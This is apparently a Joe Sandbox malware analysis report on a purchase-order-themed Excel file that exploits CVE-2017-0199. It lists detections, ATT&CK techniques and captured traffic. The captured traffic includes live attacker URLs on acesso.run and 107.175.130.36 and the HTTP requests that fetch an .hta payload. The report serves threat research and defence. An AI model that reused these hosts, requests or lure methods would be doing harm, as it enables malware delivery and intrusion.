Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
NUEVA ORDEN DE COMPRA 73244.xla.xlsx

Overview

General Information

Sample name:NUEVA ORDEN DE COMPRA 73244.xla.xlsx
Analysis ID:1544844
MD5:49aab4d665769ec8184e6bac6da8183f
SHA1:350bec361d188495922f12c493ba7e806c2d89ff
SHA256:2861d1f7642e8d2bae9122936b7c38a4d53faa9d3c267dc4a46054f54387da6c
Tags:xlaxlsxuser-abuse_ch
Infos:

Detection

Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Machine Learning detection for sample
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Document misses a certain OLE stream usually present in this Microsoft Office document type
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 3380 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • AcroRd32.exe (PID: 3752 cmdline: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" -Embedding MD5: 2F8D93826B8CBF9290BC57535C7A6817)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 172.67.162.95, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3380, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49163
Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49163, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3380, Protocol: tcp, SourceIp: 172.67.162.95, SourceIsIpv6: false, SourcePort: 443
Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3380, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-10-29T20:44:09.631426+010020244491Attempted User Privilege Gain192.168.2.2249164107.175.130.3680TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: NUEVA ORDEN DE COMPRA 73244.xla.xlsxReversingLabs: Detection: 18%
Source: NUEVA ORDEN DE COMPRA 73244.xla.xlsxJoe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: unknownHTTPS traffic detected: 172.67.162.95:443 -> 192.168.2.22:49163 version: TLS 1.2

Software Vulnerabilities

barindex
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
Source: global trafficDNS query: name: acesso.run
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.162.95:443
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.175.130.36:80
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.162.95:443
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.162.95:443
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.162.95:443
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.162.95:443
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.162.95:443
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.162.95:443
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.162.95:443
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.162.95:443
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.162.95:443
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.162.95:443
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.162.95:443
Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.162.95:443
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.162.95:443
Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.162.95:443
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.162.95:443
Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.162.95:443
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.162.95:443
Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.162.95:443
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.162.95:443
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.162.95:443
Source: global trafficTCP traffic: 172.67.162.95:443 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.175.130.36:80
Source: global trafficTCP traffic: 107.175.130.36:80 -> 192.168.2.22:49164
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.175.130.36:80
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.175.130.36:80
Source: global trafficTCP traffic: 107.175.130.36:80 -> 192.168.2.22:49164
Source: global trafficTCP traffic: 107.175.130.36:80 -> 192.168.2.22:49164
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.175.130.36:80
Source: global trafficTCP traffic: 107.175.130.36:80 -> 192.168.2.22:49164
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.175.130.36:80
Source: Joe Sandbox ViewIP Address: 172.67.162.95 172.67.162.95
Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49164 -> 107.175.130.36:80
Source: global trafficHTTP traffic detected: GET /wMyYAg?&morsel=bewildered&bifocals=oafish&egg HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: acesso.runConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /80/de/seethegoodgirlwhoismylovershealwayslovedmealotwithhereyes.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 107.175.130.36Connection: Keep-Alive
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.36
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.36
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.36
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.36
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.36
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F88B7D41.emfJump to behavior
Source: global trafficHTTP traffic detected: GET /wMyYAg?&morsel=bewildered&bifocals=oafish&egg HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: acesso.runConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /80/de/seethegoodgirlwhoismylovershealwayslovedmealotwithhereyes.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 107.175.130.36Connection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: acesso.run
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 29 Oct 2024 19:44:09 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25Content-Length: 300Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 33 2e 31 2e 33 20 50 48 50 2f 38 2e 31 2e 32 35 20 53 65 72 76 65 72 20 61 74 20 31 30 37 2e 31 37 35 2e 31 33 30 2e 33 36 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25 Server at 107.175.130.36 Port 80</address></body></html>
Source: NUEVA ORDEN DE COMPRA 73244.xla.xlsx, 81C30000.0.drString found in binary or memory: https://acesso.run/wMyYAg?&morsel=bewildered&bifocals=oafish&egg
Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49163
Source: unknownHTTPS traffic detected: 172.67.162.95:443 -> 192.168.2.22:49163 version: TLS 1.2

System Summary

barindex
Source: NUEVA ORDEN DE COMPRA 73244.xla.xlsxOLE: Microsoft Excel 2007+
Source: ~DFDEEDFBF10F1DD7AF.TMP.0.drOLE: Microsoft Excel 2007+
Source: 81C30000.0.drOLE: Microsoft Excel 2007+
Source: NUEVA ORDEN DE COMPRA 73244.xla.xlsxOLE indicator, VBA macros: true
Source: NUEVA ORDEN DE COMPRA 73244.xla.xlsxStream path 'MBD00F25731/\x1Ole' : https://acesso.run/wMyYAg?&morsel=bewildered&bifocals=oafish&eggrhFNjY:3u.A/`B*115:gj(C*\]5jMMZfY4JhA927eK7ehyRoCFSzrlxXTi3xZTLOUElDI0unOgjHD7o8dpKUlM1I1ivvOYXX4vMPFvAD5SinPixn1dQrIWg1YdeXPEyCLgaXJqwLaIqmFIWxxSPeRWdKsowJrzBeahAS8YzRdENlGHzwCQ3yeoy1rxSSYHYLzF2a0u5r9YdlM5WSYDNfzXq0JANthNHfcgs{t?}dYB]Z'
Source: 81C30000.0.drStream path 'MBD00F25731/\x1Ole' : https://acesso.run/wMyYAg?&morsel=bewildered&bifocals=oafish&eggrhFNjY:3u.A/`B*115:gj(C*\]5jMMZfY4JhA927eK7ehyRoCFSzrlxXTi3xZTLOUElDI0unOgjHD7o8dpKUlM1I1ivvOYXX4vMPFvAD5SinPixn1dQrIWg1YdeXPEyCLgaXJqwLaIqmFIWxxSPeRWdKsowJrzBeahAS8YzRdENlGHzwCQ3yeoy1rxSSYHYLzF2a0u5r9YdlM5WSYDNfzXq0JANthNHfcgs{t?}dYB]Z'
Source: ~DFDEEDFBF10F1DD7AF.TMP.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: classification engineClassification label: mal60.expl.winXLSX@3/12@1/2
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$NUEVA ORDEN DE COMPRA 73244.xla.xlsxJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRA0C1.tmpJump to behavior
Source: NUEVA ORDEN DE COMPRA 73244.xla.xlsxOLE indicator, Workbook stream: true
Source: 81C30000.0.drOLE indicator, Workbook stream: true
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: NUEVA ORDEN DE COMPRA 73244.xla.xlsxReversingLabs: Detection: 18%
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" -Embedding
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
Source: NUEVA ORDEN DE COMPRA 73244.xla.xlsxStatic file information: File size 1227776 > 1048576
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: ~DFDEEDFBF10F1DD7AF.TMP.0.drInitial sample: OLE indicators vbamacros = False
Source: NUEVA ORDEN DE COMPRA 73244.xla.xlsxInitial sample: OLE indicators encrypted = True
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: NUEVA ORDEN DE COMPRA 73244.xla.xlsxStream path 'MBD00F25730/Package' entropy: 7.99679068973 (max. 8.0)
Source: NUEVA ORDEN DE COMPRA 73244.xla.xlsxStream path 'Workbook' entropy: 7.99865896972 (max. 8.0)
Source: ~DFDEEDFBF10F1DD7AF.TMP.0.drStream path 'Package' entropy: 7.99412691417 (max. 8.0)
Source: 81C30000.0.drStream path 'MBD00F25730/Package' entropy: 7.99412691417 (max. 8.0)
Source: 81C30000.0.drStream path 'Workbook' entropy: 7.99815182169 (max. 8.0)
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid Accounts13
Exploitation for Client Execution
1
Scripting
1
Process Injection
1
Masquerading
OS Credential Dumping1
File and Directory Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
Process Injection
LSASS Memory2
System Information Discovery
Remote Desktop ProtocolData from Removable Media3
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Obfuscated Files or Information
Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive14
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture4
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
NUEVA ORDEN DE COMPRA 73244.xla.xlsx18%ReversingLabsDocument-Excel.Exploit.CVE-2017-0199
NUEVA ORDEN DE COMPRA 73244.xla.xlsx100%Joe Sandbox ML
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
acesso.run
172.67.162.95
truefalse
    unknown
    NameMaliciousAntivirus DetectionReputation
    https://acesso.run/wMyYAg?&morsel=bewildered&bifocals=oafish&eggfalse
      unknown
      http://107.175.130.36/80/de/seethegoodgirlwhoismylovershealwayslovedmealotwithhereyes.htafalse
        unknown
        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs
        IPDomainCountryFlagASNASN NameMalicious
        172.67.162.95
        acesso.runUnited States
        13335CLOUDFLARENETUSfalse
        107.175.130.36
        unknownUnited States
        36352AS-COLOCROSSINGUSfalse
        Joe Sandbox version:41.0.0 Charoite
        Analysis ID:1544844
        Start date and time:2024-10-29 20:42:14 +01:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 4m 24s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:defaultwindowsofficecookbook.jbs
        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
        Run name:Without Instrumentation
        Number of analysed new started processes analysed:7
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample name:NUEVA ORDEN DE COMPRA 73244.xla.xlsx
        Detection:MAL
        Classification:mal60.expl.winXLSX@3/12@1/2
        EGA Information:Failed
        HCA Information:
        • Successful, ratio: 100%
        • Number of executed functions: 0
        • Number of non-executed functions: 0
        Cookbook Comments:
        • Found application associated with file extension: .xlsx
        • Found Word or Excel or PowerPoint or XPS Viewer
        • Attach to Office via COM
        • Active ActiveX Object
        • Active ActiveX Object
        • Scroll down
        • Close Viewer
        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe
        • Report size getting too big, too many NtQueryValueKey calls found.
        • VT rate limit hit for: NUEVA ORDEN DE COMPRA 73244.xla.xlsx
        TimeTypeDescription
        15:44:31API Interceptor116x Sleep call for process: AcroRd32.exe modified
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        172.67.162.950001.xlsGet hashmaliciousRemcosBrowse
          Payment Advice.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
            Order-1351125X.docx.docGet hashmaliciousFormBookBrowse
              2MbHBiqXH2.rtfGet hashmaliciousRedLineBrowse
                Invoice LGMSCH0040924 Paid - EFT Remittance Advice and Receipt.docx.docGet hashmaliciousRedLineBrowse
                  Kobe 045EX07227 CLG6739.docx.docGet hashmaliciousUnknownBrowse
                    Kobe 045EX07227 CLG6739.docx.docGet hashmaliciousUnknownBrowse
                      PROFORMAXINVOICE.docx.docGet hashmaliciousLokibotBrowse
                        MV HTK Lavender.docGet hashmaliciousLokibotBrowse
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          acesso.run0001.xlsGet hashmaliciousRemcosBrowse
                          • 172.67.162.95
                          Payment Advice.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                          • 172.67.162.95
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          AS-COLOCROSSINGUS0001.xlsGet hashmaliciousRemcosBrowse
                          • 192.3.101.193
                          seemybestthingwhichigiventouformakebestappinesswogiven.htaGet hashmaliciousCobalt StrikeBrowse
                          • 192.3.101.21
                          niceworkingthingswithgreatthingsevengetbackwithgoodnews.htaGet hashmaliciousCobalt Strike, GuLoader, HTMLPhisherBrowse
                          • 107.175.113.214
                          bestintercomthingswhichgivebestthingstogetmeback.htaGet hashmaliciousCobalt Strike, HTMLPhisherBrowse
                          • 192.3.101.8
